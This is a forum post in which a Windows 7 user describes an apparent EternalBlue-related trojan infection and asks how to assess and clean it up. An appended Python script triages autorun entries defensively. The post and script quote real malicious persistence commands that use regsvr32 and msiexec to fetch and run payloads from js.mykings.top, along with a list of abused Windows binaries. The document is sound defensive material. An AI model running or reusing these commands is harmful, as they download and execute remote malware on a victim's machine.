Sorry if I messed up in any manner, e.g. title, details, tags, layout, venue, response plan, etc. I know a little of the stacks and security in general.
Short Version:
- I found material on my other machine which almost certainly is an EternalBlue related infection.
- Evidence suggests it's most likely either a variant of Petya ransomware, or a spying & control trojan (Cyphort, Symantec).
- No damages are visible so far, and can't tell if infection is active, waiting, or dead.
- Would like advice on how to progress.
Events: Yesterday I booted up my other machine to be greeted with a "virus (Skeeyah) found & quarantined" message from my AV (MSE). Apparently Skeeyah is a type of "trojan", which is stuff that has full spying and control capacity on the victim machine, no restrictions.
Due to past experiences, I decided to manually revise my machine's condition, and I saw some initial red flags which made me immediately power off my machine & disconnect its network cable, then go into Safe Mode. Follow-up investigation suggests the initial red flags were false-positives after all. However, I found actual red flags during the same follow-up.
Actual Red Flags: There are five msconfig entries on the "Startup" tab, listed below & ordered by suspicion level (hope table renders fine):

| Startup Item | Manufacturer | Command | My File Search Results |
|---|---|---|---|
| Microsoft(R) Windows(R) Operating System | Microsoft Corporation | `regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll` | Can find scrobj.dll in a few places but not in said path, modified in 2009. |
| Windows Installer - Unicode | Microsoft Corporation | `msiexec.exe /I http://js.mykings.top:280/helloworld.msi /q` | Cannot find helloworld.msi |
| uplimex | Unknown | `rundll32.exe "[AppDataPath]\Local\uplimex.dll",uplimex` | Can find uplimex.dll in said path, modified 27th of June. |
| Softonic | Unknown | `[AppDataPath]\Roaming\Softonic\Softonic.com` | Cannot find Softonic.* |
| BeyluxeMessenger | Unknown | `"[ProgramFilesx86Path]" /hide` | Cannot find bey*.* |
- Two URLs take the lead. Searching the web for them showed MANY non-English sites (which I skipped), but also two articles by Cyphort and Symantec, relating these URLs to "trojan" infections that utilize EternalBlue's exploit, and their impact seems as bad as the Skeeyah noted before.
- Next is this uplimex, don't know it, can't find it on the web, and it doesn't look cool, especially since the file's modified date matches one of the Petya ransomware attacks, which uses the EternalBlue exploit that was just mentioned (isn't OS modify date easy to fabricate though?).
- Then there's Softonic stuff, I probably accessed the website many times but don't remember downloading stuff specific to them.
- Lastly, BeyluxeMessenger. Name is familiar, maybe I had it in the past but not right now. Just in case it's related to infections I thought of mentioning it.
Machine Status Around/After Finding Red Flags:
- It probably stayed running for 30 minutes before the false-positive red flags were spotted, at which point I switched it to Safe Mode for another 90 minutes before I powered down.
- I didn't get to run a full AV scan yet, and it seems AV cannot launch Real-Time Protection while in Safe Mode.
- Did not check the firewall's current condition, however access to Task Manager and regedit seem fine.
My Security Level: Microsoft Security Essentials (MSE) and Windows Firewall on a Windows 7, although to be honest the first two are not always active and now I'm suspecting the 3rd might not be up to date. Gotta check all of that.
Initial False-Positive Red Flags: Some process showing up on Task Manager then disappearing, named DAO.22501899.exe, pathed under [AppDataPath]\Local\NVIDIA\NvBackend\Packages\0000a540\, as well as many files in adjacent folders mostly named either vops-[gamename].[somenumber].exe or streaming-assets-[gamename].[somenumber].exe. Although, upon coming across this article, I suppose that general directory is expected to have such stuff?
Questions:
State & Impact:
- Any idea what infections do/did I have? Is it all just Skeeyah remnants or is there more to deal with?
- Can their activity state be recognized? (i.e. active, waiting, dead)
- Any idea on their damage scope?
- Skeeyah was busted yesterday, but did it land yesterday or like 17 years ago?
- Would Ransomware encrypt systematically? I mean, does it seek to finish directories it started in for example, or does it encrypt simultaneously all over the place?
- Identifying ransomed files? I suppose they'd either look corrupt (though actually encrypted) or something in their name, neighbors or upon usage would indicate they've been ransomed, correct?
- Trojans' scope? I should assume all data, including passwords, logs, history, screen/mic/cam output has been compromised, although contents of well-encrypted files would be safe from acquisition, correct? What else to worry about?
- Entry point? My understanding is that for EternalBlue, there's a certain Windows update to safeguard against it, and the machine could well have been out of date on that. If the update was there though, or this wasn't EternalBlue, any specific possibility other than the usual "bad file downloaded"?
Resolution/Follow-Up:
- Can I trust MSE that it handled Skeeyah and in time? Or is it possible Skeeyah was there long ago? Or could MSE have missed something?
- What follow-up do I have? All that I can think of is a full scan by MSE, then replacing it with Symantec and full-scanning by that too, then manually disabling msconfig entries and deleting corresponding files.
- How safe is Safe-Mode in these scenarios? I heard it can be blocked, but how easy/hard is that? And if it is accessible, how much does it protect? What if networking/command was also enabled?
- How useful is monitoring processes via Task Manager? It helped me several times in the past, can't tell if it's just luck or for real though. How easy/hard is it to find weird names or high CPU usage there? How easy/hard is it to pose as usual legitimate processes? Is there enough timeframe for a problem to be spotted by a person?
Sorry for the long post, I tried my best to include all what's necessary and summarize/lay it all out in a nice format. Many forward thanks for your time & contribution.
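The startup table from the question, checked mechanically, as an added example that is not part of the original post. The script takes msconfig-style (name, command) pairs and flags the living-off-the-land patterns the table shows: `regsvr32 /i:<URL> scrobj.dll` (a signed Microsoft binary fetching and running a remote scriptlet), `msiexec /I <URL>` (a remote package installed silently), and `rundll32` loading a DLL from the user's AppData. It deliberately ignores the Startup Item and Manufacturer columns, because msconfig fills those from the version information of the host executable, so a remote-payload entry launched through `regsvr32.exe` or `msiexec.exe` shows up as "Microsoft Corporation" even though the payload is not Microsoft's. The sample entries are the five rows from the table (the `js.mykings.top` URLs are the ones quoted there); `[AppDataPath]` and `[ProgramFilesx86Path]` are expanded to constructed paths, and the hypothetical names `assess`, `triage` and `read_run_keys` are this example's own. On Windows the script additionally reads the HKCU/HKLM Run and RunOnce keys; elsewhere it only scores the samples.

```python
"""Triage Windows autorun entries for living-off-the-land persistence.

Added example, not code from the original post. SAMPLE_ENTRIES are the
five msconfig Startup rows from the post, with the [AppDataPath] and
[ProgramFilesx86Path] placeholders expanded to constructed paths.
"""
import re
import sys

# Signed Windows binaries routinely abused to fetch or run a payload.
LOLBINS = {"regsvr32", "msiexec", "rundll32", "mshta", "wscript",
           "cscript", "powershell", "certutil", "bitsadmin"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# %APPDATA%-style variables or a literal ...\AppData\Local\ / \AppData\Roaming\ segment.
APPDATA_RE = re.compile(r"%(?:local)?appdata%|\\AppData\\(?:Local|Roaming)\\",
                        re.IGNORECASE)

# Constructed sample: name and command columns from the post's msconfig table.
SAMPLE_ENTRIES = [
    ("Microsoft(R) Windows(R) Operating System",
     "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll"),
    ("Windows Installer - Unicode",
     "msiexec.exe /I http://js.mykings.top:280/helloworld.msi /q"),
    ("uplimex", r'rundll32.exe "C:\Users\user\AppData\Local\uplimex.dll",uplimex'),
    ("Softonic", r"C:\Users\user\AppData\Roaming\Softonic\Softonic.com"),
    ("BeyluxeMessenger", r'"C:\Program Files (x86)" /hide'),
]


def executable_name(command):
    """Lowercase basename of the program a command line launches, without .exe."""
    command = command.strip()
    if command.startswith('"'):                      # quoted path
        end = command.find('"', 1)
        first = command[1:end] if end > 0 else command[1:]
    else:
        first = command.split(None, 1)[0] if command else ""
    name = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def assess(command):
    """Return the reasons an autorun command line is suspicious ([] if none)."""
    exe = executable_name(command)
    lowered = command.lower()
    urls = URL_RE.findall(command)
    if exe == "regsvr32" and "/i:http" in lowered and "scrobj.dll" in lowered:
        return ["regsvr32 fetching a remote scriptlet through scrobj.dll"]
    if exe == "msiexec" and urls:
        return ["msiexec installing a package from a URL"]
    if exe == "rundll32" and APPDATA_RE.search(command):
        return ["rundll32 loading a DLL from the user profile"]
    if exe in LOLBINS and urls:
        return [f"{exe} given a URL on its command line"]
    if urls:
        return ["startup command references a URL"]
    if APPDATA_RE.search(command):
        return ["program runs from the user profile rather than Program Files"]
    return []


def triage(entries):
    """Keep only flagged (name, command) pairs, each with its reasons, in input order."""
    return [(name, cmd, assess(cmd)) for name, cmd in entries if assess(cmd)]


def read_run_keys():
    """On Windows, enumerate the Run/RunOnce keys of HKCU and HKLM; elsewhere []."""
    if sys.platform != "win32":
        return []
    import winreg  # only available on Windows
    hives = (("HKCU", winreg.HKEY_CURRENT_USER), ("HKLM", winreg.HKEY_LOCAL_MACHINE))
    subkeys = (r"Software\Microsoft\Windows\CurrentVersion\Run",
               r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
               r"Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run")
    entries = []
    for hive_name, hive in hives:
        for sub in subkeys:
            try:
                key = winreg.OpenKey(hive, sub)
            except OSError:          # key absent or access denied
                continue
            with key:
                index = 0
                while True:
                    try:
                        value_name, data, _ = winreg.EnumValue(key, index)
                    except OSError:  # no more values under this key
                        break
                    entries.append((f"{hive_name}\\{sub}\\{value_name}", str(data)))
                    index += 1
    return entries


if __name__ == "__main__":
    for name, cmd, reasons in triage(SAMPLE_ENTRIES + read_run_keys()):
        print(f"[!] {name}\n    {cmd}\n    -> {'; '.join(reasons)}")
```

Run on the sample rows it flags the two URL entries, the rundll32 entry and the Softonic entry, and passes the BeyluxeMessenger row. The Run keys are only part of what msconfig's Startup tab and a real persistence sweep cover (Startup folders, scheduled tasks, services, Winlogon and WMI subscriptions are not read here); Sysinternals Autoruns enumerates those, and the same scoring can be applied to its exported command column.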